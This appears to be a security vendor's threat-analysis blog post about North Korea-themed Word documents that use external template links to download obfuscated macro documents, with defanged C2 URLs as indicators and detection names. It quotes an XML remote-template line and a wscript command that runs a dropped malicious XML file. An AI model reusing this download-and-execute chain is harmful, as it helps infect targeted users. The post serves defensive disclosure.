Malicious Word Documents with External Link of North Korea Related Materials

In the previous, ASEC analysis team has introduced various types of document-based malware. Among them, malicious documents of North Korea related materials were generally produced in HWP file format. You can check the relevant information from previous ASEC blog posts. Today, DOC (Word) documents containing North Korea related materials collected by ASEC analysis team will partially be introduced.

These documents are assumed to be distributed via email, and they had following content within. Upon opening, it connects to ‘External URL’ and download additional document files via code written within XML. Within XML, the document can connect to the external URL defined as External as shown in examples below. Most of the recently distributed documents related to North Korea use such an attack technique, therefore users must be aware of these attacks to prevent damage.

Example of External Attack (Part of XML code)
Target=”hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6″ TargetMode=”External“/>

[Document 1] Filename: Questionnaire.docx

● External URL: hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6

[Document 2] Filename: Business Report.docx

● External URL: hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6

[Document 3] Filename: Analysis of North Korea’s 8th Party Congressdocx

● External URL: hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6

[Document 4] Filename: Conclusion of the Party Congress.docx

● External URL: hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119

[Document 5] Filename: 2021-0112 Comprehensive Analysis of the Party Congress.docx

● External URL: hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119

As [Document 1, 2, 3] were protected, ASEC analysis team couldn’t open the files right away, the team had to first unlock them to open the documents. [Document 1, 2] with VBA Macro Word files which seem to follow the operation flow shown below will be explained.

[Figure 1] – Operation flow

[Document 1] contains a questionnaire related to North Korea with its file protected. Inside the document, there exists the following XML file inside to download and connect additional malicious macro word document via External.

[Figure 3] – External Access XML

The document file downloaded from ‘hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6’ that attempts to connect to the target is also a word document and contains a malicious macro. The macro code is obfuscated as shown below and when it is run, the code creates a malicious xml inside the template folder where basic office user’s template files are located and runs it. As shown in the figure below that shows the intermediate code which debugs the obfuscated macro, you can see the xml path to be created and the details.

[Figure 4] – Macro debugging intermediate code

  • Command: wscript.exe //e:vbscript //b C:\Users\[user name]\AppData\Roaming\Microsoft\Templates\1589989024.xml
[Figure 5] – Details of 1589989024.xml

As shown in the figure above, the created xml file attempts to access to the additional malicious network address.

[Document 2] also has a malicious macro word document of intermediate stage. Considering that their operation flow and obfuscated macro format are very similar, the two documents are likely produced by the same attacker group. Summary on C2 in the two documents are shown below, and it is assumed that their goal is to additionally download malware and run it.

[Document 1] Filename: Questionnaire.docx

○ Download address for additional DOC word file after connecting to XML External: hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6

○ Additional access address for XML created from document above:
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
[Document 2] Filename: Business Report.docx

○ Download address for additional DOC word file after connecting to XML External:
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6

○ Additional access address for XML created from document above:
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1

As mentioned above, these documents are sent via email and are highly likely to be sent to people engaged in North Korea-related fields. Since social engineering technique attacks via emails have substantially increased, users must remain vigilant to prevent damage by the attacks.

AhnLab detects and blocks the files above using the following aliases:

[File Detection]
Downloader/DOC.External
Downloader/XML.Generic
Downloader/DOC.Generic
Downloader/DOC.Agent

[IOC Info]
hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1
hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6

5 3 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments